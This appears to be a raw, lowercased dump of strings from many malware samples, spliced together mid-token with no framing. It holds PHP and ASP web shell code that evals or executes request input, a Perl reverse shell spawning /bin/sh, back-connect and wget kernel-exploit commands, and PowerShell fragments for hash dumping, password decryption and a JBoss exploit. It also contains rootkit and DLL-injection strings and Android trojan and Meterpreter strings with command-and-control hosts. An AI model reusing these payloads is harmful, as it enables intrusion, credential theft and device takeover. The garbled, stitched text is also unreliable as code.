{name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.7.6)mozilla/5.0 (windows; u; windows nt 5.1; zh-cn; rv:1.7.6)?sessd=&sessc=&sessk=3a08fe7b8c4da6ed09f21c3ef97efce2_zn11cthreadpool10getbatcheserst6vectorist4pairissiesais2_ee_znss4_rep10_m_destroyerksaice@@glibcxx_3.4_znst6vectorimsaimee13_m_insert_auxen9__gnu_cxx17__normal_iteratoripms1_eerkm_znst6vectorist4pairissiesais1_ee13_m_insert_auxen9__gnu_cxx17__normal_iteratorips1_s3_eerks1__zst20__throw_out_of_rangepkc@@glibcxx_3.4pages.touchpadz.combat.touchpadz.comstat.touchpadz.comsk2.touchpadz.comtreasurehunter.pdbjucheckcmdlinedecryptedbarcodmsports.dllnddeapi.dllglmf32.dll<requestedexecutionlevel level=\"requireadministrator\" uiaccess=\"false\">cmutil.dllmprapi.dllskype.datskype.inicreatewindowyiwefhiwqcreatedesktopmydesktop
1 rookie/1.0$processinfo.arguments=\"-nop -c $downloadcradle\"$powershellexe=$env:windir+'\\syswow64\\windowspowershell\\v1.0\\powershell.exe'$postdata=\"script=println+new+processbuilder%28%27\"+$($cmd)+\"$url = \"http://\"+$($rhost)+\":\"+$($port)+\"/script\"$cmd = [system.web.httputility]::urlencode($cmd)$null = $enumbuilder.defineliteral('logon', 0x2000)$enumbuilder = $modulebuilder.defineenum('sspi.secpkg_flag', 'public', [int32])$enc = get-posthashdumpscript$lmhash = decryptsinglehash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.computehash($hbootkey[0..0x0f] + [bitconverter]::getbytes($rid) + $lmntstr);install-ssp -path .\\mimilib.dll$finalshellcode.length@(0x60,0xe8,0x04,0,0,0,0x61,0x31,0xc0,0xc3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$targetmethod.invoke($null, @(0x11112222)) | out-null$poolpasswordcmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqinvoke-command -scriptblock $remotescriptblock -argumentlist @($pebytes64, $pebytes32, \"void\", 0, \"\", $exeargs)$base64decoded = [convert]::frombase64string($cpassword)$xmlfiles += get-childitem -path \"\\\\$domaincontroller\\sysvol\" -recursefunction get-decryptedcpassword {$up = test-connection -count 1 -quiet -computername $computer $out | add-member noteproperty 'password' $passwordexploit-jboss$url = \"http$($ssl)://\" + $($rhost) + ':' + $($port)\"/jmx-console/htmladaptor?action=invokeop&name=jboss.system:servicehttp://blog.rvrsh3ll.netremote url to your own warfile to deploy.[dllimport(\"advapi32.dll\", setlasterror = true, entrypoint = \"credreadw\"[string] $msg = \"failed to enumerate credentials store for user '$env:username'\"rtn = credread(\"target\", cred_type.generic, out cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\powershellrunner.pdbp
1 gk%1_slocal t = w.exec2str(\"regedit local r = w.exec2str(\"catap*.txt link*.txt node*.tun virtualencryptednetwork.licencemove o fakevirtualencryptednetwork.dllsinfo | basex b 32url | dext l 30w.exec2str(execstr)netnfo irc | basex b 32urlw.exec(\"wfw status\")exec(\"samdump\")cat virtualencryptednetwork.ini|grepif string.lower(k) == \"securityproviders\" thenexec2str(\"plist b | grep netsvcs\").*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*sauron_kblog_key =resolve hosts that answerprint only replying ipsdo not display mac addressesinject using process name or pid. defaultconvert mode: read log from file and convert to textmaximum running time in seconds64, 64url, 32, 32url or 16.force decoding when input is invalid/corruptthis cruftassemble rows of dns names back to a single string of dataremoves checks of dns names and lengths (during split)randomize data lengths (length/2 to length)n
1 begin===tfud#of_com4mail_file#
1 lppe == nullrunexecmd.dllm
1 if %1.==. goto ende
1 iodeletesymboliclinkiodeletedeviceiocreatesymboliclinkuser32.dllyruntime errorappidflagsgetlaglookupaccc:\\users\\careful_snow\\desktop\\htran\\release\\htran.pdb=========== code by lion & bkbll, welcome to [url]http://www.cnhonker.com[/url] t
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa 